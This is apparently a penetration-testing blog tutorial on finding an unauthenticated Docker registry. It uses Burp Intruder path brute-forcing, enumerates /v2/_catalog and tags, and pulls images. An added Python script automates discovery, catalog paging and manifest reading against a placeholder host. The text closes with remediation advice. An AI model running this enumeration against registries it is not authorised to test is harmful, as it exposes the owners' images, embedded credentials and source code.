Hacking the Docker Registry with Burp Suite

H1Xploit
Published in System Weakness
3 min read · Mar 14, 2023


In this blog post, we will walk through the process of finding a security weakness in an exposed Docker registry by using Burp Suite's Intruder feature. Specifically, we will brute-force path names until we hit the registry's HTTP API (the /v2/ endpoint), list the repositories it exposes, and then pull an image from one of them to get at its files.

Scenario: Our target domain is redacted.com, and we want to find any security vulnerabilities in their Docker registry. Let’s get started!

Step 1: Set up Burp Suite

First, we need to set up Burp Suite as our proxy for intercepting and manipulating web traffic. Open Burp Suite, and make sure that the proxy is running on the default port 8080. Next, configure your browser to use Burp Suite as a proxy by setting the HTTP proxy to “localhost” and the port to “8080”.

Step 2: Find the registry API path

Now that Burp Suite is set up, we can brute-force path names to find where the registry's API lives. To do this, we will use Burp Suite's Intruder feature. First, capture a request to the target by browsing to redacted.com in our browser. In Burp Suite, go to the "Proxy" tab, find the captured request in the HTTP history, right-click it and select "Send to Intruder".

In the Intruder tab, go to the "Positions" tab. Click "Clear §" to remove any automatically added payload positions, then highlight the first path segment of the request (e.g. the "a" in "/a/") in the request editor and click "Add §" to mark the highlighted text as the payload position.

Now go to the "Payloads" tab and click "Load ..." under the payload settings. Choose the wordlist "directory-list-2.3-medium.txt" (the DirBuster list that ships with SecLists). This is a medium-sized list of common directory names that we will use to brute-force the path.

Finally, click the "Start attack" button. Burp Suite will send one request per word in the list. Sort the results by status code or response length: a Docker registry answers GET /v2/ with HTTP 200, an empty JSON body "{}" and the header "Docker-Distribution-Api-Version: registry/2.0" when it accepts unauthenticated requests, and with HTTP 401 plus a "WWW-Authenticate" header when authentication is enforced. A 200 here is the finding; a 401 means you are done unless you have credentials. In the Community edition Intruder is throttled, so a list of over 200,000 words takes a long time; a short list that contains "v2" is enough to confirm a registry.

Step 3: List the repositories

Once the /v2/ endpoint answers, request the catalog endpoint to list the repositories the registry holds: "redacted.com/v2/_catalog". The response is JSON of the form {"repositories": [...]}. Note that the catalog is paginated: the registry returns at most a fixed number of entries per request (100 in the reference implementation) and points to the next page in a Link header, so add ?n=<count> and follow Link until it stops appearing. For each repository, "redacted.com/v2/<repository-name>/tags/list" returns the available tags.

Step 4: Pull the repository

Now that we have a repository name and a tag, we can pull the image to get its files. To do this, we will use the "docker pull" command to fetch the image onto our local machine.

First, look at the manifest request in Burp Suite.

In our case, the manifest URL is "redacted.com/v2/<repository-name>/manifests/<manifest-tag>".

Note the "<repository-name>" and "<manifest-tag>" values from the response; docker does not take the API URL itself but an image reference of the form host/repository:tag.

Next, open a terminal window and type the following command

docker pull redacted.com/<repository-name>:<manifest-tag>

Replace "<repository-name>" and "<manifest-tag>" with the actual values. If the registry is served over plain HTTP, Docker refuses to pull until the host is listed under "insecure-registries" in /etc/docker/daemon.json. After the pull, "docker save" or "docker run" gives access to the image filesystem; alternatively, each layer digest in the manifest can be downloaded directly from "redacted.com/v2/<repository-name>/blobs/<digest>" without Docker at all.
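The whole procedure from Step 2 to Step 4 (probe for the API path, walk the paginated catalog, list tags, read the manifest, build the pull reference) as a Python script. This is an added example, not code from the post: the host registry.example.com, the short wordlist and the sample responses are constructed assumptions so that it runs offline, and http_fetch is the live transport to swap in when testing a registry you are authorised to touch.

```python
import json
import re
from urllib.error import HTTPError
from urllib.parse import urljoin
from urllib.request import Request, urlopen

HOST = "registry.example.com"  # assumed target; the post's host is redacted
BASE = f"http://{HOST}"
MANIFEST_V2 = "application/vnd.docker.distribution.manifest.v2+json"
NEXT_LINK = re.compile(r'<([^>]+)>\s*;\s*rel="next"')

def http_fetch(url, accept=None):
    """Live transport: GET url, returning (status, headers, body) even on 4xx/5xx."""
    req = Request(url, headers={"Accept": accept} if accept else {})
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except HTTPError as err:
        return err.code, dict(err.headers), err.read()

def check_v2(status, headers):
    """Classify a GET /v2/ answer. A conformant registry always sends the
    Docker-Distribution-Api-Version header; 200 with no challenge = no auth."""
    if status == 200 and headers.get("Docker-Distribution-Api-Version", "").startswith("registry/2.0"):
        return "unauthenticated"
    if status == 401 and "WWW-Authenticate" in headers:
        return "auth-required"
    return "not-a-v2-registry"

def find_api_root(fetch, base, wordlist):
    """The Intruder step: request /<word>/ for each word and stop at the first
    path that answers like a v2 registry. Returns (path, verdict) or None."""
    for word in wordlist:
        status, headers, _ = fetch(urljoin(base, f"/{word}/"))
        verdict = check_v2(status, headers)
        if verdict != "not-a-v2-registry":
            return f"/{word}/", verdict
    return None

def list_repositories(fetch, base, page_size=100):
    """Walk /v2/_catalog; one request only returns the first page, the rest
    are reached through the Link: <...>; rel="next" header."""
    repos, url = [], urljoin(base, f"/v2/_catalog?n={page_size}")
    while url:
        status, headers, body = fetch(url)
        if status != 200:
            raise RuntimeError(f"_catalog returned {status}")
        repos.extend(json.loads(body)["repositories"])
        match = NEXT_LINK.search(headers.get("Link", ""))
        url = urljoin(base, match.group(1)) if match else None
    return repos

def list_tags(fetch, base, repo):
    """Tags of one repository; [] when the repo is listed but has none left."""
    status, _, body = fetch(urljoin(base, f"/v2/{repo}/tags/list"))
    if status == 404:
        return []
    if status != 200:
        raise RuntimeError(f"tags/list for {repo} returned {status}")
    return json.loads(body).get("tags") or []

def manifest_layers(fetch, base, repo, tag):
    """Schema-2 manifest (the Accept header matters, otherwise you may get
    schema 1). Returns (config digest, [layer digests]); every digest can be
    downloaded from /v2/<repo>/blobs/<digest>."""
    status, _, body = fetch(urljoin(base, f"/v2/{repo}/manifests/{tag}"), MANIFEST_V2)
    if status != 200:
        raise RuntimeError(f"manifest {repo}:{tag} returned {status}")
    manifest = json.loads(body)
    return manifest["config"]["digest"], [layer["digest"] for layer in manifest["layers"]]

def pull_reference(host, repo, tag):
    """What `docker pull` takes: host/repo:tag, not the /v2/.../manifests URL."""
    return f"{host}/{repo}:{tag}"

# Constructed sample responses shaped like registry/2.0 answers (not captured
# from any real host), so the script runs offline.
CONFIG_DIGEST, LAYER_DIGEST = "sha256:" + "ab" * 32, "sha256:" + "cd" * 32
V2_HDR = {"Docker-Distribution-Api-Version": "registry/2.0"}
SAMPLE_RESPONSES = {
    "/v2/": (200, V2_HDR, b"{}"),
    "/v2/_catalog?n=2": (200, {**V2_HDR, "Link": '</v2/_catalog?n=2&last=app%2Fweb>; rel="next"'},
                         b'{"repositories":["app/api","app/web"]}'),
    "/v2/_catalog?n=2&last=app%2Fweb": (200, V2_HDR, b'{"repositories":["internal/backup"]}'),
    "/v2/app/api/tags/list": (200, V2_HDR, b'{"name":"app/api","tags":["1.0","latest"]}'),
    "/v2/app/api/manifests/latest": (200, V2_HDR, json.dumps({
        "schemaVersion": 2, "mediaType": MANIFEST_V2,
        "config": {"mediaType": "application/vnd.docker.container.image.v1+json",
                   "size": 1469, "digest": CONFIG_DIGEST},
        "layers": [{"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
                    "size": 2811969, "digest": LAYER_DIGEST}]}).encode()),
}
SAMPLE_RESPONSES["/v2/app/api/manifests/1.0"] = SAMPLE_RESPONSES["/v2/app/api/manifests/latest"]

def sample_fetch(url, accept=None):
    """Offline stand-in for http_fetch, keyed on the URL path."""
    return SAMPLE_RESPONSES.get(url[len(BASE):], (404, V2_HDR, b'{"errors":[{"code":"NAME_UNKNOWN"}]}'))

if __name__ == "__main__":
    fetch = sample_fetch  # swap in http_fetch for a live, authorised test
    print(find_api_root(fetch, BASE, ["admin", "api", "v2"]))
    for repo in list_repositories(fetch, BASE, page_size=2):
        for tag in list_tags(fetch, BASE, repo):
            print(pull_reference(HOST, repo, tag), manifest_layers(fetch, BASE, repo, tag))
```

Two details the script handles that a single Burp request does not show: the catalog only reveals the first page unless the Link header is followed, and a repository listed in the catalog can still answer 404 on tags/list once its manifests were deleted, which is why list_tags treats that as an empty repository rather than an error.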

Congratulations! You have found an exposed Docker registry: one that serves its v2 API without authentication, so anyone who can reach it can list and pull every image, including any credentials or source code baked into the layers. The fix on the owner's side is to put authentication in front of the registry (a token service, or at least basic auth) and to keep it off the public internet altogether.

Reference: https://notsosecure.com/anatomy-of-a-hack-docker-registry
